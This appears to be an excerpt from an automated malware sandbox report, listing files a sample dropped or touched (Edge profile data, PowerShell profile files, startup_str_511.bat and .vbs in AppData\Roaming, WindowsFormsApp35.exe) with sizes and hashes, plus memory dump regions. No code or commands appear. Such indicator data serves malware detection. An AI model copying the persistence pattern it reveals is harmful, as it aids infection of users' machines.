                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                Filesize

                                                                                40B

                                                                                MD5

                                                                                20d4b8fa017a12a108c87f540836e250

                                                                                SHA1

                                                                                1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                SHA256

                                                                                6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                SHA512

                                                                                507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                Filesize

                                                                                11KB

                                                                                MD5

                                                                                dfab2464644aab33c350147e7a2cead6

                                                                                SHA1

                                                                                4b9950801ac9b105b23d47743f68f7a2a08d1b32

                                                                                SHA256

                                                                                e8307cb8b5fb8483517833b1d6ea1f9520156643e91370b0e51ed41513ca0318

                                                                                SHA512

                                                                                56b8b2125c603b20935c161945910b9e6b1006a0cf1cbb3e48765640d4fe86da063da221fcd648f1a23b389766fe07ef6c075f6eaedbf8ebf9a599240322d782

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                Filesize

                                                                                67KB

                                                                                MD5

                                                                                6b378e57f1a80d004de70a24ffef8039

                                                                                SHA1

                                                                                bc9044d0579dd341513ca2be57d237c78b7070c3

                                                                                SHA256

                                                                                c7e22b958f572e9ec5f6fdaae134f3516ab278586ccb318708a67a0676bba04b

                                                                                SHA512

                                                                                365cf354be80305d1ea2d322272fa8e303de9ea69340d8db3f66cefcdc2d1c23d8087fe2ffe9aaa3b0c65939e928c2648b27a0cfa17a5651ad26dc3640b2e5f9

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                Filesize

                                                                                71KB

                                                                                MD5

                                                                                93b3f36487f28e87775857c4f6b2e3b0

                                                                                SHA1

                                                                                f67996a2518b6832e0845c8c492a25216937915b

                                                                                SHA256

                                                                                2fad2d92e7dadc92f6968930136386bd340a5b4bbcae53ecffefe20fbe4db667

                                                                                SHA512

                                                                                36b7b869a7e75572b2f662863f423fa5d5d5d14e5e89b4714cccfea300f1a2320c63e9d9b9e409615fcde701db7d8c31b90029551541dcd306302962a4de34f7

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                d28a889fd956d5cb3accfbaf1143eb6f

                                                                                SHA1

                                                                                157ba54b365341f8ff06707d996b3635da8446f7

                                                                                SHA256

                                                                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                SHA512

                                                                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                ef72c47dbfaae0b9b0d09f22ad4afe20

                                                                                SHA1

                                                                                5357f66ba69b89440b99d4273b74221670129338

                                                                                SHA256

                                                                                692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f

                                                                                SHA512

                                                                                7514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                9bc110200117a3752313ca2acaf8a9e1

                                                                                SHA1

                                                                                fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

                                                                                SHA256

                                                                                c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

                                                                                SHA512

                                                                                1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                dbbf71e9fb59f80938f09809b160e441

                                                                                SHA1

                                                                                8b9a517d846cb9a0a284f77ed88328236a85055f

                                                                                SHA256

                                                                                e1de59d46c7c47af2d62f7754524b080a706be6b38d55a03733a10c3675598b1

                                                                                SHA512

                                                                                90b75d43ddb81c710fb8fe2fd15b5c05181c774d3f401e47862006adb1703bc65ad8fead4aaf7a28b8e2bbe7249f3de998bd9432c1e62fa8718a19dacc4b8840

                                                                              • C:\Users\Admin\AppData\Local\Temp\Registry

                                                                                Filesize

                                                                                442KB

                                                                                MD5

                                                                                04029e121a0cfa5991749937dd22a1d9

                                                                                SHA1

                                                                                f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                SHA256

                                                                                9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                SHA512

                                                                                6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gfoytwua.3zn.ps1

                                                                                Filesize

                                                                                60B

                                                                                MD5

                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                SHA1

                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                SHA256

                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                SHA512

                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                              • C:\Users\Admin\AppData\Roaming\startup_str_511.bat

                                                                                Filesize

                                                                                494KB

                                                                                MD5

                                                                                de82866157bb103028bbf463dd9bf345

                                                                                SHA1

                                                                                40d0cd08819061031ee7fa6206008a9cf39e1285

                                                                                SHA256

                                                                                df4e8e044536a39fe070a53a67f8991285978d5edbd0dc02d0dfa7e939e4bad5

                                                                                SHA512

                                                                                74251b8e4bd24b5d83ab2a78607d874d7f440f229c87a95b533b6970313349d8c858c547d5f4ac5b9c2eebebc2b01f90ef836f0daca06c71517ab198bf1d5938

                                                                              • C:\Users\Admin\AppData\Roaming\startup_str_511.vbs

                                                                                Filesize

                                                                                115B

                                                                                MD5

                                                                                89d258731d433d484f4826d92d7b985c

                                                                                SHA1

                                                                                a9cbe0d890e5d319827739a2af570cba8747d4c5

                                                                                SHA256

                                                                                fd5634858b936f3aa9ec07de2a80a46f998f340e69ab80e979589ffa9f0f3a68

                                                                                SHA512

                                                                                d36bd0b6d2ebef9e40be0ef409b9719b9edabacf3b77294e68329c03cf9b028961bdb215627a4703c90f79d37e7dc4f926834248ae923e1252e6c1713a726480

                                                                              • C:\Users\Admin\Desktop\WindowsFormsApp35.exe

                                                                                Filesize

                                                                                187KB

                                                                                MD5

                                                                                94fff3fde8a2d293bd47ba2c9f8eb0e8

                                                                                SHA1

                                                                                1f92986d6d2d5e3a2e6f23bbc792e43a2ac74a81

                                                                                SHA256

                                                                                087398c9e5ce46f49802ff854931ef54fe0f342c51c423750420800dfd1334b7

                                                                                SHA512

                                                                                8557c5cf7dc76164aa90f5c11d940416cc88643c98d87c11feab9454ba5fb63825647b987e871a355b6e57623803b61da764240fbbe6d8fc57015ae1a7f65ffe

                                                                              • memory/828-126-0x00000269E9940000-0x00000269E9952000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                              • memory/828-213-0x00000269EB1B0000-0x00000269EB1BC000-memory.dmp

                                                                                Filesize

                                                                                48KB

                                                                              • memory/828-248-0x00000269E9480000-0x00000269E948C000-memory.dmp

                                                                                Filesize

                                                                                48KB

                                                                              • memory/828-215-0x00000269EB6F0000-0x00000269EBC18000-memory.dmp

                                                                                Filesize

                                                                                5.2MB

                                                                              • memory/1512-246-0x0000020AE7E70000-0x0000020AE7EB4000-memory.dmp

                                                                                Filesize

                                                                                272KB

                                                                              • memory/1512-247-0x0000020B00000000-0x0000020B00076000-memory.dmp

                                                                                Filesize

                                                                                472KB

                                                                              • memory/2124-140-0x0000000000730000-0x0000000000766000-memory.dmp

                                                                                Filesize

                                                                                216KB

                                                                              • memory/2124-141-0x0000000005650000-0x0000000005BF4000-memory.dmp

                                                                                Filesize

                                                                                5.6MB

                                                                              • memory/2124-144-0x0000000005E20000-0x0000000006034000-memory.dmp

                                                                                Filesize

                                                                                2.1MB

                                                                              • memory/2124-142-0x0000000004FC0000-0x0000000005052000-memory.dmp

                                                                                Filesize

                                                                                584KB

                                                                              • memory/2124-143-0x00000000051D0000-0x00000000051DA000-memory.dmp

                                                                                Filesize

                                                                                40KB

                                                                              • memory/3896-70-0x0000024BD9350000-0x0000024BD93B4000-memory.dmp

                                                                                Filesize

                                                                                400KB

                                                                              • memory/3896-69-0x0000024BD90A0000-0x0000024BD90A8000-memory.dmp

                                                                                Filesize

                                                                                32KB

                                                                              • memory/3896-68-0x0000024BD90B0000-0x0000024BD90D2000-memory.dmp

                                                                                Filesize

                                                                                136KB